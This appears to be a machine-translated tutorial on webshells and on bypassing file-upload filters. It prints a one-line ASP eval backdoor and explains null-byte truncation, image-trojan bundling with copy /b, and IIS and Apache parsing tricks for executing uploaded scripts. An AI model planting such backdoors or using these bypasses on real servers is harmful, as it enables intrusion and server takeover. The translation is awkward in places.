Webshell can be divided into PHP script Trojan, ASP script Trojan, and .NET-based script Trojan and JSP script Trojan according to the script. In foreign countries, there are dynamic web pages written in the Python scripting language, and of course there are webshells related to them. Webshell is also divided into horses, ponies and Trojan horses according to function. For example: <%eval request("pass")%> usually write this sentence in a document, and then change the file name to xx.asp. Then pass it to the server. Use the eval method to convert the request ("pass") into code execution. The function of the request function is to apply external files. This is equivalent to the client configuration of a Trojan horse.
Features of
Webshell
1. Webshell mostly appears in the form of dynamic scripts, which can also be called a backdoor tool for websites
2. Webshell is an asp or php Trojan backdoor
3. Webshell can pass through the server firewall. Since the data exchanged with the controlled server or remote host is transmitted through port 80, it will not be intercepted by the firewall.
4. Webshell generally does not leave records in the system log, but only leaves some data submission records in the web log of the website. It is difficult for inexperienced administrators to see traces of intrusion.
5. The hacker placed these asp or PHP Trojan backdoor files in the web directory of the web server, mixed with normal web files. Hackers can use the web to control the web server controlled by the asp or php Trojan backdoor, including uploading and downloading files, viewing databases, executing arbitrary program commands, etc.
Webshell upload bypass method
(1) Bypassing the foreground script to detect the extension and uploading Webshell
When a user uploads a file on the client, the client and the server do not have any information interaction, and the type of the uploaded file is judged by the foreground script file.
Whitelist detection: Allow uploading of jpg, png and other files. If you want to upload a php format file, you can add a .jpg suffix at the end. After submission, use burp to capture and intercept the packet and delete the jpg suffix.
(B) Use 00 to truncate upload Webshell: use PHP function
1. Include and require generally read files inside the website
2. file_get_contents is generally used to open a url or a file
3. file_exists determine whether the file exists
4. All parameters in url can be controlled with %00
5. Truncation – local file inclusion
Truncation type: php%00 truncation
Truncation condition: PHP version is less than 5.3.4
php's magic_quotes_gpc is off
(1) When opening magic_quotes_gpc, all single quotes and double quotes. Both the backslash and the null character (%00) will be escaped with a backslash
(2) There are many functions with similar functions: addslashes(), mysql_escape_string(), mysql_real_escape_string(), etc.
(3) When magic_quotes_gpc is turned off and the PHP version is still 5.3.10, it still cannot be truncated. So prove that the two conditions of php version and gpc must be met before they can be truncated.
(4) In addition to the above, file_get_contents can also be used in conjunction with php%00.
(5) Principle: Using programmers to filter the file upload path is not strict when writing a program, resulting in a 0x00 upload truncation vulnerability, assuming the upload path is: [http://xx.xx.xx.xx/upfiles/lubr.php .jpg], replace [.] behind [lubr.php] with [0x00] (that is, burp packet capture, using hexadecimal, and [.] hexadecimal is 2e, so put Replace 2e with 00, click forword to upload). When uploading, when the file reads [0x00], it will be considered that the file has ended, so the content of [lubr.php.jpg] will be written to [lubr.php], so as to achieve the purpose of the attack.
(3) Construct picture horses, bypass file content detection and upload Webshell
1. Windows bundling technology: copy /b main file + additional file newly generated file copy /b 7.jpg + 1.aspx c.jpg (append the content of 1.aspx to the file of 7.jpg and generate a new one The file name is c.jpg, and the extension [.jpg] is changed to [.jpg.aspx]
2. GetlmageSize function
This function is used to detect whether the file is a valid picture file (content characteristics), not to detect the file extension
(4) Bypass the server extension detection upload
1. IIS6.0 parsing vulnerability
(1) Create a folder named *.asp, *.asa under the website, and any files with extensions in its directory will be executed as IIS files by IIS. For example, create the directory vidun.asp, then /vidun.asp/1.jpg will be executed as an asp file
(2) When uploading pictures on the website, change the name of the web Trojan file to ".asp;.jpg", which will also be interpreted and executed by IIS as an asp file. For example, upload an image file named "vidun,asp;.jpg", the file can be parsed and executed as an ASP file.
2. Apache parsing vulnerability
(1) No matter what the file suffix name is, as long as it is .php.* at the end, it will be parsed into a php file by the apache server.
(2) The mime.type configuration file defines the types of files that Apache can parse.
(3) When apache encounters xxx.php.rar or xxx.php.111, those that are not defined in the mime.types file by default will be parsed into php files.
(4) Principle: When the browser submits the file to the server, the server will detect the file extension submitted by the browser according to the set black and white list. If the uploaded file extension does not meet the whitelist limit, then Upload is not allowed, otherwise the upload is successful. Change the file name of the Trojan horse [lubr.php] to [lubr.php.abc]. First, when the server verifies the file extension, it verifies [.abc] (because it is parsed from the right to the left of the file name), as long as the extension satisfies the server-side whitelist rules, it can be uploaded. In addition, when accessing the file on the browser side, if Apache cannot resolve the [.abc] extension, it will look forward for the parseable extension, namely [.php]. In a word, Trojans can be parsed, that is, they can be connected by Chinese kitchen knives.
